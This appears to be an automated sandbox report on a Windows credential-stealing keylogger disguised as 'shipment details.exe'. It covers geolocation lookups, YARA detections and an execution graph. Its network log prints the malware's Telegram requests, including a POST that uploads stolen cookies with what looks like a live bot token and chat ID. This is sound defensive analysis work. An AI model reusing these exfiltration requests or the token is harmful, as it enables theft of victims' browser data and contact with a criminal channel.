                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E9nClVfN1pfnTeJwsQ6fsvZLrVNvNHi%2F32bSrCpaNPHcbFgIfnHA8WiIJH5%2F4A7X7x1m29pnwTUvoZE1%2BkqWZlLg7eZmvsQ8OFWoM4eeVDUILiCU2CyKoSTEjhHQ2OQ4gu7UWz5R"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cf7767c19494297-EWR
                                                                              2024-10-08 16:21:14 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                              2024-10-08 16:21:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              6192.168.2.549721188.114.97.34434788C:\Users\user\Desktop\shipment details.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-08 16:21:16 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                              Host: reallyfreegeoip.org
                                                                              Connection: Keep-Alive
                                                                              2024-10-08 16:21:16 UTC688INHTTP/1.1 200 OK
                                                                              Date: Tue, 08 Oct 2024 16:21:16 GMT
                                                                              Content-Type: application/xml
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              access-control-allow-origin: *
                                                                              vary: Accept-Encoding
                                                                              Cache-Control: max-age=86400
                                                                              CF-Cache-Status: HIT
                                                                              Age: 70808
                                                                              Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CCoaGGYaGyJMm%2FAZ%2BpWDTx2yNjPD%2Fv5aa%2FN5BUIxeEWbHkhiTrul3LnX%2FryF6oR3%2BMXVe252gO1qSDP34VaROeAYRSq5P8GpTnC%2FB2I%2FAHfROBw%2BcwUZ41BYCddUPeiAftVt5016"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cf77687c843434a-EWR
                                                                              2024-10-08 16:21:16 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                              2024-10-08 16:21:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              7192.168.2.549723188.114.97.34434788C:\Users\user\Desktop\shipment details.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-08 16:21:18 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                              Host: reallyfreegeoip.org
                                                                              Connection: Keep-Alive
                                                                              2024-10-08 16:21:18 UTC680INHTTP/1.1 200 OK
                                                                              Date: Tue, 08 Oct 2024 16:21:18 GMT
                                                                              Content-Type: application/xml
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              access-control-allow-origin: *
                                                                              vary: Accept-Encoding
                                                                              Cache-Control: max-age=86400
                                                                              CF-Cache-Status: HIT
                                                                              Age: 70810
                                                                              Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k3pmcnnVVlnbuGzfFRpKEmU2c8d69ZxRFYO7kjh66QEk9nrp%2FAAPoruIwl%2Fj87ptj0KegfvFfV4e6XrPrjNfmr1qRGepwVxeJa4Jb75Xwbe4149S6YdlC8%2BJ%2B3hnuV%2BdMPRDnzDb"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cf77695992a42e7-EWR
                                                                              2024-10-08 16:21:18 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                              2024-10-08 16:21:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              8192.168.2.549725188.114.97.34434788C:\Users\user\Desktop\shipment details.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-08 16:21:19 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                              Host: reallyfreegeoip.org
                                                                              2024-10-08 16:21:19 UTC680INHTTP/1.1 200 OK
                                                                              Date: Tue, 08 Oct 2024 16:21:19 GMT
                                                                              Content-Type: application/xml
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              access-control-allow-origin: *
                                                                              vary: Accept-Encoding
                                                                              Cache-Control: max-age=86400
                                                                              CF-Cache-Status: HIT
                                                                              Age: 70811
                                                                              Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x0CtX3p%2Fuk9rq1l%2BaK4IMJVWZFYzOwcXKptdptSqv8BjKi8dpvXZXuagdR8xmZd8KUa9S6BxeAVPSGlcvwbezYjwXCCs7TItkcYWV5eET4oa33SddBnGwG5B%2F2QfqXuj%2F%2FuJs6K3"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cf7769d48234362-EWR
                                                                              2024-10-08 16:21:19 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                              2024-10-08 16:21:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              9192.168.2.549727149.154.167.2204434788C:\Users\user\Desktop\shipment details.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-08 16:21:20 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:571345%0D%0ADate%20and%20Time:%2009/10/2024%20/%2004:32:20%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20571345%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                              Host: api.telegram.org
                                                                              Connection: Keep-Alive
                                                                              2024-10-08 16:21:20 UTC344INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0
                                                                              Date: Tue, 08 Oct 2024 16:21:20 GMT
                                                                              Content-Type: application/json
                                                                              Content-Length: 55
                                                                              Connection: close
                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                              Access-Control-Allow-Origin: *
                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                              2024-10-08 16:21:20 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                              Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              10192.168.2.562359149.154.167.2204434788C:\Users\user\Desktop\shipment details.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-08 16:21:26 UTC352OUTPOST /bot7556271394:AAEi7387e6n5TKFT7iFrsH4cBWT2k35v3D8/sendDocument?chat_id=2135869667&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                              Content-Type: multipart/form-data; boundary=------------------------8dce87960e4dfa2
                                                                              Host: api.telegram.org
                                                                              Content-Length: 1257
                                                                              2024-10-08 16:21:26 UTC1257OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 38 37 39 36 30 65 34 64 66 61 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 6f 6f 6b 69 65 73 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 43 6f 6f 6b 69 65 73 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 37 31 33 34 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 30 38 2f 31 30 2f 32 30 32 34 20
                                                                              Data Ascii: --------------------------8dce87960e4dfa2Content-Disposition: form-data; name="document"; filename="Cookies_Recovered.txt"Content-Type: application/x-ms-dos-executableCookies | user | VIP Recovery PC Name:571345Date and Time: 08/10/2024
                                                                              2024-10-08 16:21:27 UTC388INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0
                                                                              Date: Tue, 08 Oct 2024 16:21:27 GMT
                                                                              Content-Type: application/json
                                                                              Content-Length: 520
                                                                              Connection: close
                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                              Access-Control-Allow-Origin: *
                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                              2024-10-08 16:21:27 UTC520INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 35 36 32 37 31 33 39 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 31 30 31 30 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6f 6f 6f 6f 63 74 6f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 31 33 35 38 36 39 36 36 37 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 45 57 53 54 41 4e 44 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 68 65 6c 69 4b 6f 6b 6f 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 38 34 30 34 34 38 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 43 6f 6f
                                                                              Data Ascii: {"ok":true,"result":{"message_id":44,"from":{"id":7556271394,"is_bot":true,"first_name":"1010","username":"ooooctobot"},"chat":{"id":2135869667,"first_name":"NEWSTAND","username":"PheliKoko","type":"private"},"date":1728404487,"document":{"file_name":"Coo


                                                                              Click to jump to process

                                                                              Click to jump to process

                                                                              Click to dive into process behavior distribution

                                                                              Click to jump to process

                                                                              Target ID:0
                                                                              Start time:12:21:02
                                                                              Start date:08/10/2024
                                                                              Path:C:\Users\user\Desktop\shipment details.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\shipment details.exe"
                                                                              Imagebase:0x720000
                                                                              File size:488'448 bytes
                                                                              MD5 hash:606686AD6A08EBE2CC694B5618CFAAB5
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: MALWARE_Win_DLInjector02, Description: Detects downloader injector, Source: 00000000.00000002.4523008463.0000000005420000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                              Reputation:low
                                                                              Has exited:false

                                                                              Target ID:1
                                                                              Start time:12:21:02
                                                                              Start date:08/10/2024
                                                                              Path:C:\Users\user\Desktop\shipment details.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\shipment details.exe"
                                                                              Imagebase:0xbc0000
                                                                              File size:488'448 bytes
                                                                              MD5 hash:606686AD6A08EBE2CC694B5618CFAAB5
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.4520239872.0000000002F1D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000001.00000002.4520239872.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                              Reputation:low
                                                                              Has exited:false

                                                                              Reset < >

                                                                                Execution Graph

                                                                                Execution Coverage:7.7%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:5.1%
                                                                                Total number of Nodes:98
                                                                                Total number of Limit Nodes:11
                                                                                execution_graph 21864 5e08bc0 21866 5e08c25 21864->21866 21865 5e08c72 21866->21865 21867 5e06f70 PeekMessageW 21866->21867 21868 5e09088 WaitMessage 21866->21868 21870 5e087ec 21866->21870 21867->21866 21868->21866 21871 5e09928 DispatchMessageW 21870->21871 21872 5e09994 21871->21872 21872->21866 21873 5e00ec0 21874 5e00eda 21873->21874 21875 5e00eed 21873->21875 21878 5e00f37 21874->21878 21883 5e00f48 21874->21883 21879 5e00f48 21878->21879 21880 5e00f5e 21879->21880 21888 5e00f88 21879->21888 21894 5e00f98 21879->21894 21880->21875 21884 5e00f57 21883->21884 21885 5e00f5e 21883->21885 21886 5e00f88 2 API calls 21884->21886 21887 5e00f98 2 API calls 21884->21887 21885->21875 21886->21885 21887->21885 21889 5e00fc0 21888->21889 21891 5e00fec 21888->21891 21890 5e00fc9 21889->21890 21900 5e012c8 21889->21900 21905 5e012b8 21889->21905 21890->21880 21891->21880 21895 5e00fc0 21894->21895 21897 5e00fec 21894->21897 21896 5e00fc9 21895->21896 21898 5e012c8 2 API calls 21895->21898 21899 5e012b8 2 API calls 21895->21899 21896->21880 21897->21880 21898->21897 21899->21897 21901 5e012d3 21900->21901 21902 5e012e3 21901->21902 21910 5e01318 OleInitialize 21901->21910 21912 5e01312 21901->21912 21902->21891 21906 5e012d3 21905->21906 21907 5e012e3 21906->21907 21908 5e01312 OleInitialize 21906->21908 21909 5e01318 OleInitialize 21906->21909 21907->21891 21908->21907 21909->21907 21911 5e0137c 21910->21911 21911->21902 21913 5e01318 OleInitialize 21912->21913 21914 5e0137c 21913->21914 21914->21902 21915 cfd3e8 21916 cfd416 21915->21916 21917 cfd4e2 KiUserCallbackDispatcher 21916->21917 21918 cfd4e7 21916->21918 21917->21918 21919 cfcd08 DuplicateHandle 21920 cfcd9e 21919->21920 21921 5e044ec 21922 5e044aa 21921->21922 21923 5e044fa 21921->21923 21926 5e0225c 21922->21926 21925 5e044e3 21927 5e02267 21926->21927 21928 5e04aa7 21927->21928 21930 5e05f68 21927->21930 21928->21925 21931 5e05f87 21930->21931 21932 5e05f97 21931->21932 21935 5e06038 21931->21935 21941 5e06029 21931->21941 21932->21928 21936 5e0604b 21935->21936 21937 5e06082 21936->21937 21947 5e06190 21936->21947 21951 5e06182 21936->21951 21937->21932 21938 5e0605c 21938->21932 21942 5e06038 21941->21942 21943 5e06082 21942->21943 21945 5e06190 GetSystemMetrics 21942->21945 21946 5e06182 GetSystemMetrics 21942->21946 21943->21932 21944 5e0605c 21944->21932 21945->21944 21946->21944 21948 5e061a2 21947->21948 21950 5e061af 21947->21950 21949 5e06038 GetSystemMetrics 21948->21949 21948->21950 21949->21950 21950->21938 21952 5e06134 21951->21952 21955 5e0618a 21951->21955 21953 5e06137 GetSystemMetrics 21952->21953 21954 5e0613c 21952->21954 21953->21954 21954->21938 21955->21938 21956 cfcac0 21957 cfcb06 GetCurrentProcess 21956->21957 21959 cfcb58 GetCurrentThread 21957->21959 21960 cfcb51 21957->21960 21961 cfcb8e 21959->21961 21962 cfcb95 GetCurrentProcess 21959->21962 21960->21959 21961->21962 21963 cfcbcb 21962->21963 21964 cfcbf3 GetCurrentThreadId 21963->21964 21965 cfcc24 21964->21965 21966 cfa330 21967 cfa33f 21966->21967 21970 cfa418 21966->21970 21975 cfa428 21966->21975 21971 cfa45c 21970->21971 21972 cfa439 21970->21972 21971->21967 21972->21971 21973 cfa660 GetModuleHandleW 21972->21973 21974 cfa68d 21973->21974 21974->21967 21976 cfa45c 21975->21976 21977 cfa439 21975->21977 21976->21967 21977->21976 21978 cfa660 GetModuleHandleW 21977->21978 21979 cfa68d 21978->21979 21979->21967

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 594 5e08bc0-5e08c23 595 5e08c52-5e08c70 594->595 596 5e08c25-5e08c4f 594->596 601 5e08c72-5e08c74 595->601 602 5e08c79-5e08cb0 595->602 596->595 603 5e09132-5e09147 601->603 606 5e090e1 602->606 607 5e08cb6-5e08cca 602->607 610 5e090e6-5e090fc 606->610 608 5e08cf9-5e08d18 607->608 609 5e08ccc-5e08cf6 607->609 616 5e08d30-5e08d32 608->616 617 5e08d1a-5e08d20 608->617 609->608 610->603 620 5e08d51-5e08d5a 616->620 621 5e08d34-5e08d4c 616->621 618 5e08d22 617->618 619 5e08d24-5e08d26 617->619 618->616 619->616 623 5e08d62-5e08d69 620->623 621->610 624 5e08d73-5e08d7a 623->624 625 5e08d6b-5e08d71 623->625 627 5e08d84 624->627 628 5e08d7c-5e08d82 624->628 626 5e08d87-5e08da4 call 5e06f70 625->626 631 5e08ef9-5e08efd 626->631 632 5e08daa-5e08db1 626->632 627->626 628->626 634 5e08f03-5e08f07 631->634 635 5e090cc-5e090df 631->635 632->606 633 5e08db7-5e08df4 632->633 643 5e090c2-5e090c6 633->643 644 5e08dfa-5e08dff 633->644 636 5e08f21-5e08f2a 634->636 637 5e08f09-5e08f1c 634->637 635->610 639 5e08f59-5e08f60 636->639 640 5e08f2c-5e08f56 636->640 637->610 641 5e08f66-5e08f6d 639->641 642 5e08fff-5e09014 639->642 640->639 645 5e08f9c-5e08fbe 641->645 646 5e08f6f-5e08f99 641->646 642->643 654 5e0901a-5e0901c 642->654 643->623 643->635 647 5e08e31-5e08e46 call 5e087c4 644->647 648 5e08e01-5e08e0f call 5e087ac 644->648 645->642 682 5e08fc0-5e08fca 645->682 646->645 658 5e08e4b-5e08e4f 647->658 648->647 663 5e08e11-5e08e2f call 5e087b8 648->663 661 5e09069-5e09086 call 5e06f70 654->661 662 5e0901e-5e09057 654->662 659 5e08ec0-5e08ecd 658->659 660 5e08e51-5e08e63 call 5e087d0 658->660 659->643 680 5e08ed3-5e08edd call 5e087e0 659->680 687 5e08ea3-5e08ebb 660->687 688 5e08e65-5e08e95 660->688 661->643 679 5e09088-5e090b4 WaitMessage 661->679 676 5e09060-5e09067 662->676 677 5e09059-5e0905f 662->677 663->658 676->643 677->676 684 5e090b6 679->684 685 5e090bb 679->685 690 5e08eec-5e08ef4 call 5e087f8 680->690 691 5e08edf-5e08ee2 call 5e087ec 680->691 695 5e08fe2-5e08fe5 682->695 696 5e08fcc-5e08fd2 682->696 684->685 685->643 687->610 702 5e08e97 688->702 703 5e08e9c 688->703 690->643 698 5e08ee7 691->698 704 5e08fee-5e08ffd 695->704 700 5e08fd4 696->700 701 5e08fd6-5e08fd8 696->701 698->643 700->695 701->695 702->703 703->687 704->642 704->682
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.4523846935.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5e00000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID: DispatchMessage
                                                                                • String ID:
                                                                                • API String ID: 2061451462-0
                                                                                • Opcode ID: 0e69f77e966df4869fdf02d14eb0c7a1f580fd9b15583e9abd506ee108aa12ca
                                                                                • Instruction ID: 129b34f887e9c4c34505256f9416ecb69e638fa5be4d3470fab584c9aa51c3c3
                                                                                • Opcode Fuzzy Hash: 0e69f77e966df4869fdf02d14eb0c7a1f580fd9b15583e9abd506ee108aa12ca
                                                                                • Instruction Fuzzy Hash: 7AF16170A04208CFDB14DFA9C948BADBBF2FF44304F15A559E449AB3A6DB74E985CB40

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 526 cfcab1-cfcb4f GetCurrentProcess 530 cfcb58-cfcb8c GetCurrentThread 526->530 531 cfcb51-cfcb57 526->531 532 cfcb8e-cfcb94 530->532 533 cfcb95-cfcbc9 GetCurrentProcess 530->533 531->530 532->533 534 cfcbcb-cfcbd1 533->534 535 cfcbd2-cfcbed call cfcc8f 533->535 534->535 539 cfcbf3-cfcc22 GetCurrentThreadId 535->539 540 cfcc2b-cfcc8d 539->540 541 cfcc24-cfcc2a 539->541 541->540
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32 ref: 00CFCB3E
                                                                                • GetCurrentThread.KERNEL32 ref: 00CFCB7B
                                                                                • GetCurrentProcess.KERNEL32 ref: 00CFCBB8
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00CFCC11
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.4519126057.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_cf0000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID: Current$ProcessThread
                                                                                • String ID:
                                                                                • API String ID: 2063062207-0
                                                                                • Opcode ID: 1a5014b8ee7425017c90ad4cff6d3cad65544b76b106087fc02588f762420518
                                                                                • Instruction ID: d7e8f7f31b6d8ad4cedb2cd926583d45b26a9bedb220c5a6cac0bd70e1cd4aeb
                                                                                • Opcode Fuzzy Hash: 1a5014b8ee7425017c90ad4cff6d3cad65544b76b106087fc02588f762420518
